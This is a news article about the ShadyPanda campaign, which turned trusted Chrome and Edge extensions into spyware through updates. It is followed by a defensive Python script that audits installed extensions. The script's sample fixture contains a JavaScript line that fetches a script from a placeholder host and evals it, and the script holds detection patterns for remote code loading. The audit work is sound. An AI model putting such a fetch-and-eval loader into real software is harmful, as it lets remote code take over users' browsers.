Your Trusted Browser Extensions Just Became Chinese Spyware


Your browser extensions just became surveillance tools for Chinese hackers. Over 4.3 million users discovered their trusted add-ons were secretly recording every click, search, and website visit in real time. Extensions like Clean Master and WeTab—tools people relied on for years—quietly transformed into spyware through routine updates that felt as normal as any software refresh.

The Long Con That Fooled Everyone

ShadyPanda spent years building trust before weaponizing popular extensions through malicious updates.

Researchers at Koi Security uncovered ShadyPanda’s patient strategy of acquiring legitimate browser extensions, then waiting years before weaponizing them. Rather than risk detection with suspicious new submissions, the China-based group pushed malicious updates to existing extensions that had accumulated millions of downloads since 2018. Clean Master alone compromised 200,000 Chrome users, while WeTab infected roughly 3 million Edge browsers. Like a sleeper cell being activated, these updates arrived through the same auto-update pipeline you trust for security patches.

Every Click Became Intelligence

The malware captured comprehensive browsing behavior and enabled complete browser takeover.

Once updated, these extensions contacted attacker-controlled domains to download arbitrary JavaScript with full browser access. Your complete digital footprint—every URL visited, search query typed, cookie stored, even mouse movements—streamed encrypted to Chinese servers. The spyware essentially turned each infected browser into a remote-controlled platform, giving hackers the same access you have to your own browsing session.

Store Security Theater Failed

Official marketplaces prioritized initial review over continuous monitoring of trusted extensions.

ShadyPanda exploited a critical gap in how Chrome and Edge stores operate. While platforms rigorously vet new submissions, they provide minimal oversight of updates to established extensions. Extensions sporting “Featured” or “Verified” badges became perfect vehicles for stealth attacks. Users reasonably trusted that official stores would catch malicious behavior, but the security theater focused on the wrong stage of the extension lifecycle.

Check Your Browser Right Now

Immediate action required to identify and remove compromised extensions.

Navigate to chrome://extensions/ or edge://extensions/ and enable Developer Mode to reveal each extension’s ID. Compare these against Koi Security’s published ShadyPanda list and immediately remove any matches. The infected extensions remained active on official stores until researchers exposed the campaign. Change your important passwords as a precaution—assume everything you browsed while infected was captured.
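The manual check above (reveal each extension’s ID, compare it against the published list) can be scripted, and the same pass can flag the behaviour described earlier: broad host access combined with code that fetches and evaluates script at runtime. The following is an added example written for this page, not a tool from Koi Security or from either browser vendor. The extension IDs in it are placeholders (the real ShadyPanda list is Koi Security’s and is not reproduced here), the profile paths are typical Linux locations and are an assumption, and the remote-code patterns are heuristics that will produce false positives; treat a hit as a reason to look closer, not as proof.

```python
"""Audit locally installed Chromium-family extensions (Chrome/Edge).

Flags (1) extensions whose ID appears on a known-bad list and (2) extensions
that request access to every site AND contain script patterns associated with
loading code from a remote server at runtime.
"""
import json
import re
import tempfile
from pathlib import Path

# PLACEHOLDER IDs: replace with the IDs from Koi Security's published list.
KNOWN_BAD_IDS = {
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",  # placeholder, not a real extension ID
}

# Heuristic patterns for code that can pull and execute script at runtime.
REMOTE_CODE_PATTERNS = [
    re.compile(r"\beval\s*\("),
    re.compile(r"new\s+Function\s*\("),
    re.compile(r"https?://[^\s'\"]+\.js"),
]

# Requesting any of these means the extension can run on every site.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def default_extension_dirs():
    """Typical extension roots on Linux (assumption; other OSes differ)."""
    home = Path.home()
    return [
        home / ".config/google-chrome/Default/Extensions",
        home / ".config/microsoft-edge/Default/Extensions",
    ]


def iter_extensions(root):
    """Yield (extension_id, version_dir) for each installed version under root.

    On-disk layout is <root>/<32-char id>/<version>/manifest.json; IDs are
    32 characters drawn from a-p.
    """
    root = Path(root)
    if not root.is_dir():
        return
    for ext_dir in root.iterdir():
        if not re.fullmatch(r"[a-p]{32}", ext_dir.name):
            continue
        for version_dir in ext_dir.iterdir():
            if (version_dir / "manifest.json").is_file():
                yield ext_dir.name, version_dir


def broad_host_access(manifest):
    """True if the manifest asks to run on every site (MV2 or MV3 keys)."""
    requested = set(manifest.get("permissions", []))
    requested |= set(manifest.get("host_permissions", []))
    for script in manifest.get("content_scripts", []):
        requested |= set(script.get("matches", []))
    return bool(requested & BROAD_HOSTS)


def remote_code_hits(version_dir):
    """Return (relative file, pattern) pairs for script files matching a heuristic."""
    hits = []
    for js in Path(version_dir).rglob("*.js"):
        text = js.read_text(encoding="utf-8", errors="ignore")
        for pat in REMOTE_CODE_PATTERNS:
            if pat.search(text):
                hits.append((str(js.relative_to(version_dir)), pat.pattern))
    return hits


def audit(root, bad_ids=KNOWN_BAD_IDS):
    """Return one findings dict per installed extension version under root."""
    findings = []
    for ext_id, version_dir in iter_extensions(root):
        manifest = json.loads((version_dir / "manifest.json").read_text(encoding="utf-8"))
        finding = {
            "id": ext_id,
            "name": manifest.get("name", "?"),
            "version": manifest.get("version", "?"),
            "known_bad": ext_id in bad_ids,
            "broad_host_access": broad_host_access(manifest),
            "remote_code_hits": remote_code_hits(version_dir),
        }
        finding["suspicious"] = finding["known_bad"] or (
            finding["broad_host_access"] and bool(finding["remote_code_hits"])
        )
        findings.append(finding)
    return findings


def build_sample_profile():
    """Construct a throwaway extension root (sample data, built here) so the
    audit can run offline: one listed ID, one benign add-on, one that pulls
    and evals a remote script."""
    root = Path(tempfile.mkdtemp(prefix="ext-audit-"))
    samples = {
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": ({"name": "Listed Placeholder", "version": "1.0"}, None),
        "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": (
            {"name": "Benign Notes", "version": "2.1", "permissions": ["storage"]},
            'console.log("notes ready");',
        ),
        "cccccccccccccccccccccccccccccccc": (
            {"name": "Tab Helper", "version": "3.4", "host_permissions": ["<all_urls>"]},
            'fetch("https://example.invalid/payload.js").then(r => r.text()).then(src => eval(src));',
        ),
    }
    for ext_id, (manifest, js) in samples.items():
        vdir = root / ext_id / manifest["version"]
        vdir.mkdir(parents=True)
        (vdir / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
        if js is not None:
            (vdir / "background.js").write_text(js, encoding="utf-8")
    return root


if __name__ == "__main__":
    # Run against the constructed sample first, then against real profile dirs.
    for root in [build_sample_profile()] + default_extension_dirs():
        for f in audit(root):
            flag = "SUSPICIOUS" if f["suspicious"] else "ok"
            print(f"{flag:10} {f['id']} {f['name']} {f['version']} {f['remote_code_hits']}")
```

The ID match is the only definitive signal; the heuristic pair (all-sites access plus a remote `.js` URL or `eval`) is what an update like the ones described above tends to need, but legitimate extensions also trip it, so review any hit by reading the flagged file before removing anything.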
